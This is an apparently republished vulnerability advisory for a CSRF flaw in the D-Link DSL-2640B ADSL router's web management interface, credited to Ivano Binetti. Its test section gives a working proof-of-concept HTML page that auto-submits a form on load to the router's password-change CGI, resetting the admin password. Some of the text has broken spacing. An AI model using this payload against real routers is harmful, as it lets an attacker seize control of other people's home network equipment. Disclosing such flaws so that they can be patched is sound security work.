D-Link DSL-2640B (ADSL Router) CSRF flaws and fixes-vulnerability warning-the black bar safety net

2012-02-21T00:00:00
ID MYHACK58:62201233167
Type myhack58
Reporter 佚名
Modified 2012-02-21T00:00:00

Description

Title: D-Link DSL-2640B (ADSL Router) CSRF Vulnerability

Author: Ivano Binetti www.badguest.cn (http://ivanobinetti.com)

Program website: http://www.d-link.com

Affected version: DSL-2640B

Test platform: Firmware Version: EU_4. 0 0; Hardware Version: B2

+-----------------------------------------------

[Change Admin Account Password by Ivano Binetti] --------+

Summary

1)Overview

2)defect description

3)Test

+----------------------------------------------------------------------+

1)Overview

D-Link DSL-2640B is an ADSL Router using (also) a web management interface.

2)Vulnerability Description

The D-Link DSL-2640B's web interface (listening on tcp/ip port 8 0) is prone to CSRF vulnerabilities which allows to change router

parameters and-among other things - to change default administrator("admin") password.

3)Test

<html>

< body onload="javascript:document. forms[0]. submit()">

< H2>CSRF Exploit to change ADMIN password</H2>

< form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">

< /form>

< /body>

< /html>